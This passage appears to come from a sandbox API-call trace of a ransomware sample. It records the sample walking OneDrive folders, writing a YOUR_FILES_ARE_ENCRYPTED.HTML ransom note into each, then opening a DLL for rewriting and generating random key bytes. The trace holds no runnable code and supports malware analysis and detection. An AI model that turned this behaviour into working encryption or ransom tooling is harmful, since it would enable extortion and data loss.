nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.552] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf9de36, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfcf9de36, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfd4c8811, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x186c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.552] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.552] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.552] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.552] lstrlenW (lpString=".mui") returned 4 [0112.552] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.553] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcf9de36, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfcf9de36, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfd4c8811, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x186c0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.553] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.553] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.553] GetProcessHeap () returned 0x600000 [0112.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ml-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.555] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.556] CloseHandle (hObject=0x330) returned 1 [0112.556] GetProcessHeap () returned 0x600000 [0112.556] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.557] GetProcessHeap () returned 0x600000 [0112.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.558] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd587570, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfd587570, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfd587570, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mn", cAlternateFileName="")) returned 1 [0112.558] StrStrIW (lpFirst="mn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.558] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn") returned 78 [0112.558] GetProcessHeap () returned 0x600000 [0112.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.559] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn" [0112.559] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn\\*" [0112.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd587570, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfd587570, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfe14cdcb, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0112.559] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd587570, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfd587570, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfe14cdcb, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.560] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe14cdcb, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe14cdcb, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfe388ff2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.560] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.560] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.560] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.560] lstrlenW (lpString=".mui") returned 4 [0112.560] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.560] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe14cdcb, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe14cdcb, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfe388ff2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.560] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0112.560] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.560] GetProcessHeap () returned 0x600000 [0112.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\mn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.561] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.562] CloseHandle (hObject=0x330) returned 1 [0112.562] GetProcessHeap () returned 0x600000 [0112.562] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.562] GetProcessHeap () returned 0x600000 [0112.562] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.563] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe46dff5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe46dff5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfe46dff5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mr", cAlternateFileName="")) returned 1 [0112.563] StrStrIW (lpFirst="mr", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.563] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr") returned 78 [0112.563] GetProcessHeap () returned 0x600000 [0112.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.564] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr" [0112.564] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr\\*" [0112.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe46dff5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe46dff5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfe683ed2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.564] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe46dff5, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe46dff5, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfe683ed2, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.564] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe683ed2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe683ed2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xff2499db, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.564] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.565] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.565] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.565] lstrlenW (lpString=".mui") returned 4 [0112.565] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.565] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe683ed2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xfe683ed2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xff2499db, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.565] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.565] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.565] GetProcessHeap () returned 0x600000 [0112.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\mr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.565] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.566] CloseHandle (hObject=0x330) returned 1 [0112.566] GetProcessHeap () returned 0x600000 [0112.566] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.566] GetProcessHeap () returned 0x600000 [0112.566] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.567] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffc1f3cf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xffc1f3cf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xffc1f3cf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ms", cAlternateFileName="")) returned 1 [0112.567] StrStrIW (lpFirst="ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.567] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms") returned 78 [0112.567] GetProcessHeap () returned 0x600000 [0112.567] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.568] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms" [0112.568] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms\\*" [0112.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffc1f3cf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xffc1f3cf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xb4ba12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x626638 [0112.569] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffc1f3cf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xffc1f3cf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xb4ba12, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="..", cAlternateFileName="")) returned 1 [0112.569] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ba12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb4ba12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1a7e8c8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.569] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.570] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.570] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.570] lstrlenW (lpString=".mui") returned 4 [0112.570] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.570] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4ba12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb4ba12, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1a7e8c8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.570] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0112.570] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.570] GetProcessHeap () returned 0x600000 [0112.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.570] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.571] CloseHandle (hObject=0x330) returned 1 [0112.571] GetProcessHeap () returned 0x600000 [0112.571] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.571] GetProcessHeap () returned 0x600000 [0112.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.572] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67fb07e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x67fb07e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xae9cb73, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x6f2a0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0112.573] StrStrIW (lpFirst="msvcp120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.573] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll") returned 88 [0112.573] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0112.573] lstrlenW (lpString=".dll") returned 4 [0112.573] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0112.573] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\msvcp120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0112.574] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=455328) returned 1 [0112.574] GetProcessHeap () returned 0x600000 [0112.574] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.576] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="91") returned 2 [0112.576] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="F4") returned 2 [0112.576] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="CE") returned 2 [0112.576] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="2A") returned 2 [0112.576] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="52") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E9") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="3D") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="97") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="5A") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="66") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A3") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="E0") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="73") returned 2 [0112.577] wsprintfW (in: param_1=0x19e0de, 